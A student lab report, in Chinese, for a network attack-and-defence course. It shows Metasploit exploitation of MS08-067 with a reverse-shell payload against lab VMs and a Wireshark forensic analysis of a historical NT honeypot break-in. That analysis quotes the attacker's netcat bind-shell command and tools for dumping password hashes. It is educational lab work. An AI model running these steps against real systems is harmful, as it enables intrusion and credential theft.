20231905 2023-2024-2 《网络攻防实践》实践六报告
1.实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
2.1 动手实践Metasploit windows attacker
在kali打开metasploit,输入msfconsole,回车后就会进入到他的控制台界面
然后先搜索一下ms08_067漏洞,搜索结果如下图。这是针对这个漏洞的渗透攻击模块。
输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08-067漏洞作为我们攻击的目标
输入命令 show payloads,显示所有可攻击载荷
输入show options展示渗透攻击需要设置的参数
输入set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接
输入命令 set LHOST 192.168.200.4,设置渗透攻击的主机为Kali;
输入命令 set RHOST 192.168.200.124,设置渗透攻击的主机为Win2k
输入exploit开始渗透攻击
在Kali上使用命令ipconfig ,可以查询到靶机的IP,攻击成功
2.2 取证分析实践:解码一次成功的NT系统破解攻击
wireshark打开下载好的snort-0204@0117.log文件
按条件筛选ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行浏览
跟踪数据包的数据流,发现117行数据包异常,该数据包有boot.ini启动,以及Unicode编码“%C0%AF”
在140行可以看到攻击者试图向服务器获取一个msadcs.dll文件
对149行追踪tcp流,可以看到字符串"ADM!ROX!YOUR!WORLD",查询TCP流中发现查询语句中“dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb”,经查询知,这次攻击是由rain forest puppy编写的msadc(2).pl渗透代码发起的
筛选ftp连接,可以看出攻击者通过建立ftpcom脚本,并用FTP连接了samdump.dll、pdump.exe、nc.exe。
在下载完文件之后,发现攻击者执行了命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限
用tcp.port == 6969筛选一下,然后追踪一下TCP流来发现攻击者的行为,发现攻击者执行了一系列ls cd dir del指令,查看靶机的文件配置,删除了部分文件
追踪TCP流可以看到有rfp.txt 文件,可以得知攻击者认为这是台蜜罐主机
2.3 团队对抗实践:windows系统远程渗透攻击和分析
攻击机IP:192.168.31.148(20231905 kali)
靶机IP:192.168.31.24(20231911 win2k)
在kali中打开msfconsole
使用ms08-067这个漏洞攻击同学虚拟机上的win2k,设置目标IP
在对方靶机里新建一个文件夹,并在文件夹下新建txt,输入目标内容
靶机可以在文件里找到这个文件夹,以及txt内容
在wireshark中发现执行命令的痕迹
3.学习中遇到的问题及解决
- 问题1:在小组攻击中无法相互连通
- 问题1解决方案:把攻击虚拟机和靶机虚拟机都设置为桥接模式,并把真机同时连接在同一局域网下 ,靶机IP设置为自动分配
4.实践总结
通过本次实验,进行了Windows操作系统安全攻防实践,动手实践Metasploit windows attacker,对解码一次成功的NT系统破解攻击进行了取证分析实践,最后进行了团队对抗实践,对windows系统远程渗透攻击和分析。通过进行实操,加深了自己对于windows系统安全的理解,提高了自己的动手能力。